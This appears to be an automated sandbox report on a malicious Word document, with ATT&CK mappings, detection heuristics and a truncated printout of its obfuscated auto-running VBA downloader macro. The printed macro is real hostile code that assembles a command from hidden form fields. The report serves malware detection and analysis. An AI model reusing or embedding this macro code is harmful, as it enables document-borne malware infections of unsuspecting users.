Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file is an Office document containing VBA macros, specifically a Document_Open macro designed for auto-execution. Heuristics indicate the use of GetObject, a common technique for executing code. The ClamAV detection as 'Doc.Downloader.Generic' strongly suggests the macro's purpose is to download a second-stage payload. No specific family could be identified, but the behavior is consistent with a downloader.
Heuristics (6)
- ClamAV: Doc.Downloader.Generic-7469466-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Generic-7469466-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12783 bytes |

SHA-256: 6403b5a288dab7046b4ca0b3dd7e349b76dfed983adc780dcc88884b3f1a3f74

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Xpkurgif"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Khytkvtzre, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Nnhdbrror As Boolean
Dim Wsczyedinudly As Double
Hrefgwynxhaep = Bdbekiiwgi
Gnjbimekzjlkb = (Erxandetz)
Goyvywzaranf = 997
Dim Lujrsqcmcdfi As Boolean
Sbtkrofqldlp = "Maxime."
Dim Gfrlficj As Boolean
Dim Hsrulvqp As Boolean
Dim Hqgdoenuj As Integer
Cfbgxmtdz = (561)
Dim Grcywkepnw As Boolean
Dim Tqynxbvha As Double
Enqonjwlooykp = Hcqtrjczhpz
Dim Cekiquxlgwrfr As Integer
Dim Rufjmhtsrg As String
Dim Coiyolzikd As Double
Udebfynayrhm = (Lojltcsivwx)
Urcboemo = ("Neque rerum.")
Snssxnlh = (Yzlzyknbmih)
Dim Wtiwpsixb As Boolean
Ryajvukobk = Gccdrlbawogv
Smadadpylqi
Dim Chuggarpi As String
Dim Qtprgutjyiqb As Boolean
Ydsxhuznccnfi = Wmdwaiqglavg
Ymgdhhxysbiv = (Meblqrcvmepq)
Hwloxvdqhbbuv = 576
Dim Cnefythzkplp As Boolean
Bnqaarvq = "Omnis excepturi voluptatem voluptatem aspernatur est."
Dim Howxzkvwfajqk As String
Dim Czxbymfzpg As Boolean
Dim Uufzmtgykw As Boolean
Auokcqkdgqyrx = (145)
Dim Mbpgrmzabzbxx As Integer
Dim Yfpyadxuwz As Boolean
Edwobwxtwv = Matnlbsmytss
Dim Osphshvcvwflz As Boolean
Dim Lqdpwlzk As String
Dim Vgilkldlci As String
Ocixkfwh = (Smndocfn)
Fyxamqklb = ("Suscipit earum maxime aut.")
Suhbahybuncis = (Yhwbfptxyqfil)
Dim Lfbfzsgcovhl As Boolean
Cqelqsdoatgy = Luznizcxgn
End Sub
Attribute VB_Name = "Rihhrozcvbo"
Attribute VB_Base = "0{67C962F7-255C-4A54-B746-5B48B0549899}{5BCEBDD0-328C-4442-8952-9E678F836C50}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Shqcibig"
Function Gykjilth()
Dim Qeviyzyuj As String
Dim Jpqpoyydzky As Double
Bdukvcnrrdmg = Qjnybvvzy
Rszbfwrkbgu = (Ygbxrmdjdrh)
Mxyycetwdj = 725
Dim Lgvvjawezzu As String
Hmxfoarhsktmd = "Aperiam dolorem veniam."
Dim Lqvxnhgfhnt As Boolean
Dim Pmmdfauswr As Boolean
Dim Whswbjgwh As Integer
Dwfqbgpsuj = (734)
Dim Gxqhcjwpzgor As String
Dim Jgdnudvdigz As Double
Mgzuyppmylbd = Djxhnqoxjo
Dim Cwcokhtrkja As Double
Dim Bkbkubkitsu As Boolean
Dim Lsepwknjmsjka As Boolean
Vaujkslgnm = (Wgjeiclvan)
Pzfpsrzuhz = ("Josh")
Xlagzmrchxqd = (Bhpykifitlm)
Dim Vmufxuphxcf As Boolean
Wsericleqse = Eoproudzvpm
Usevejolgkbmf = Xpkurgif.Khytkvtzre
Dim Ebklouvx As String
Dim Sanyvdfvm As Boolean
Uumgirzil = Paiodzfn
Hrhgccdxspvt = (Gyefcwoxgr)
Qhagqybpmd = 157
Dim Govlskev As String
Hevzkddkkpupm = "In voluptatem minus."
Dim Lyxsexcsdznad As String
Dim Mpgsavlqnymcs As Boolean
Dim Qczoglhdc As Boolean
Msaxcafpd = (396)
Dim Tvaaijtsuk As Double
Dim Jkaoykfmdrujt As Boolean
Vmxdmagjdng = Jjfvjurmblhey
Dim Cbrhrsxfx As Integer
Dim Wcbwasghcum As String
Dim Yzetaqyohahcw As Boolean
Fmdiotyoke = (Yrrlpbrjrod)
Hbpbuuetu = ("Dolores")
Qdkgaluoqba = (Prbepuqiybg)
Dim Mpkfvdobvm As Double
Jgtppfhezm = Aezlhrcdprye
Mkcmnsggedoe = Usevejolgkbmf + Rihhrozcvbo.Ewydckuorvxx + Rihhrozcvbo.Dvophcgtsfed + Rihhrozcvbo.Yasxyxdwcied
Dim Skkwyalsqq As Double
Dim Mhjfhgcm As Boolean
Jqeefvzppt = Gdvkjejwaie
Rjniytptgburu = (Tbajiyafkwx)
Tlaltinl = 81
Dim Rzfuzcato As Integer
Dziudxrddlav = "Perferendis qui."
Dim Vaiymheh As Boolean
Dim Kcebdjdiok As Integer
Dim Srqkwiivqe As String
Ecruccovfzka = (913)
Dim Atisgbkjhri As Boolean
Dim Wyxrfjlxar As Integer
Mvugtgpsg = Nyxriuuamaq
Dim Hheqhszbzlufq As Boolean
Dim Ksjfojkshsc As Double
Dim Rwgvdxylc As String
Nhnnnclrrg = (Qldnxoxyfqtk)
Zbtecitzs = ("Qui quos.")
Wffgklzbcpjaj = (Fafwocjhdkymd)
Dim Rtwqaiss As Boolean
Tjbqpbjdf = Tvstnxbvmywt
Wbwwufouw = Mkcmnsggedoe + Rihhrozcvbo.Iiunyznb + Rihhrozcvbo.Zwwhxbbjtysnu.Tag
Dim Tfwjecjksyb As Boolean
Dim Gyusotyht
... (truncated)